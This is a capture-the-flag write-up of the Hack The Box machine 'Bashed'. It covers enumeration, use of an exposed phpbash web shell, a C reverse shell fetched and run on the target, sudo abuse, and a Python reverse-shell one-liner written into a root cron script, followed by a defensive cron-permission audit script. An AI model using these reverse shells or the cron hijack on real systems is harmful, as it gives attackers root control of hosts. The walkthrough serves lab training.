HTB: Bashed

Enumeration

I ran nmap and found that port 80 is the only open port.

❯ ports=$(nmap -p- -T4 -Pn -n $(gettarget) | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

❯ echo $ports 
80

❯ nmap -sC -sV -p$ports -Pn 10.129.106.102 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 18:15 BST
Nmap scan report for 10.129.106.102
Host is up (0.048s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.78 seconds

The web server appears to be the only service, so I went to check it:

Interesting: it looks like this server hosts a file called “phpbash”. Clicking the “phpbash” title takes us to another page with a link to the “phpbash” GitHub repository:

The page tells us that “phpbash” is developed on this exact server, and the GitHub description says “phpbash is a semi-interactive PHP shell compressed into a single file”. If the “phpbash” file really is on this server, it could be very useful as a foothold.

User flag

I tried a few different URL paths looking for the phpbash file, without success, so I used gobuster to scan for directories and found some interesting ones:

❯ gobuster dir -u http://10.129.106.102 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.106.102
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/05/08 18:31:00 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://10.129.106.102/images/]
/uploads              (Status: 301) [Size: 318] [--> http://10.129.106.102/uploads/]
/php                  (Status: 301) [Size: 314] [--> http://10.129.106.102/php/]    
/css                  (Status: 301) [Size: 314] [--> http://10.129.106.102/css/]    
/dev                  (Status: 301) [Size: 314] [--> http://10.129.106.102/dev/]    
/js                   (Status: 301) [Size: 313] [--> http://10.129.106.102/js/]     
/fonts                (Status: 301) [Size: 316] [--> http://10.129.106.102/fonts/]

I tried some of the directories and finally found the phpbash shell at “http://10.129.106.102/dev/phpbash.php”:

I did a quick enumeration and found the flag in the “/home/arrexel/” directory; luckily for me, the user.txt file has read permission for “others”, so I was able to read it.

Root flag

First I set up a reverse shell, just for convenience. I tried a bash reverse shell without success, so I ended up downloading a C reverse shell and uploading the compiled binary to the target:

❯ git clone https://github.com/izenynn/c-reverse-shell.git
[...]

❯ cd c-reverse-shell

# the repo includes a script to quickly change the ip and port, so we don't need to edit the code
❯ ./change_client.sh 10.10.14.93 4444
Done!

# now compile!
❯ make
[...]

❯ python3 -m http.server 8080
[...]

I downloaded the binary onto the target and executed it:

www-data@bashed:/dev/shm# wget 10.10.14.93:8080/reverse.elf
[...]
# chmod +x doesn't work
www-data@bashed:/dev/shm# chmod 711 reverse.elf
www-data@bashed:/dev/shm# ./reverse.elf

I upgraded the shell:

❯ nc -lvvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.93] from (UNKNOWN) [10.129.106.102] 54798

python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@bashed:/dev/shm$ export TERM=xterm
www-data@bashed:/dev/shm$ ^Z

❯ stty raw -echo; fg

www-data@bashed:/dev/shm$

We are ready; time to upload linpeas.sh for a quick enumeration.

I found something interesting:

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

I can run commands as the “scriptmanager” user, so let’s open a bash session as that user:

www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/dev/shm$ 

I ran linpeas.sh again as the scriptmanager user to see what we can do with it. I found that scriptmanager owns a directory called “scripts” in “/”:

╔══════════╣ Unexpected in root
/scripts
/initrd.img
/vmlinuz
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/scripts/test.txt
/home/scriptmanager/.gnupg/trustdb.gpg
/home/scriptmanager/.gnupg/pubring.gpg
/home/scriptmanager/.gnupg/gpg.conf
/var/log/auth.log
/var/log/syslog

It contains two files:

scriptmanager@bashed:/dev/shm$ ls -la /scripts/
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec  4  2017 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 May  8 10:17 test.txt

According to linpeas.sh, the “test.txt” file was modified in the last 5 minutes, which is strange.

If we take a look at the “test.py” and “test.txt” files, we notice that “test.txt” is a file created by the script “test.py”. So, if “test.txt” was modified in the last 5 minutes and it is a file that “test.py” creates, we can assume “test.py” is running from a cron job, probably as root, because root is the owner of the “test.txt” file.

I modified the “test.py” file with nano so that the script now contains a Python reverse shell. Now I only have to listen with netcat and wait: the next time root executes “test.py”, I will get a reverse shell as root.

scriptmanager@bashed:/scripts$ cat test.py 
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.93",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

After waiting a few seconds I got the reverse shell:

❯ nc -lvvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.93] from (UNKNOWN) [10.129.106.102] 37980
# whoami
whoami
root
# 

And that’s all! I’m root.
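The root step above worked because a root cron job executed a script that lived in a directory owned by a lower-privileged user. The following audit is an added example (not part of the original write-up): it parses system crontab lines, resolves the absolute paths each job references, and flags any file or parent directory that the job's user does not control or that is group/world writable. `stat_fn` and `resolve_uid` are injectable only so it can be exercised against constructed metadata; by default it inspects the live filesystem.

```python
import os
import pwd
import re
import stat

# System crontab / cron.d line: minute hour dom month dow user command
CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def parse_system_crontab(text):
    """Return (user, command) pairs, skipping blanks, comments and VAR=value lines."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if m:
            jobs.append((m["user"], m["cmd"]))
    return jobs

def absolute_paths(command):
    """Absolute paths the command references (interpreter, script, arguments)."""
    return [tok for tok in command.split() if tok.startswith("/")]

def tamper_reasons(path, run_as_uid, stat_fn=os.stat):
    """Ways a job running as run_as_uid could be hijacked through `path` or its directory."""
    reasons = []
    for label, p in (("file", path), ("dir", os.path.dirname(path) or "/")):
        try:
            st = stat_fn(p)
        except FileNotFoundError:
            reasons.append(f"{label} {p} does not exist")
            continue
        if st.st_uid not in (0, run_as_uid):  # owned by a third party, like /scripts on Bashed
            reasons.append(f"{label} {p} owned by uid {st.st_uid}, job runs as uid {run_as_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append(f"{label} {p} is group/world writable ({stat.S_IMODE(st.st_mode):o})")
    return reasons

def audit(crontab_text, resolve_uid=lambda u: pwd.getpwnam(u).pw_uid, stat_fn=os.stat):
    """Map 'user: command' to the tamper reasons found for any path it references."""
    findings = {}
    for user, cmd in parse_system_crontab(crontab_text):
        uid = resolve_uid(user)
        for p in absolute_paths(cmd):
            reasons = tamper_reasons(p, uid, stat_fn)
            if reasons:
                findings.setdefault(f"{user}: {cmd}", []).extend(reasons)
    return findings
```

On a real host, `audit(open("/etc/crontab").read())` plus the files under /etc/cron.d gives the list of jobs whose script or directory can be modified by someone other than the account they run as; a root job pointing into a user-owned directory is exactly the pattern that handed over this box.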

>:D
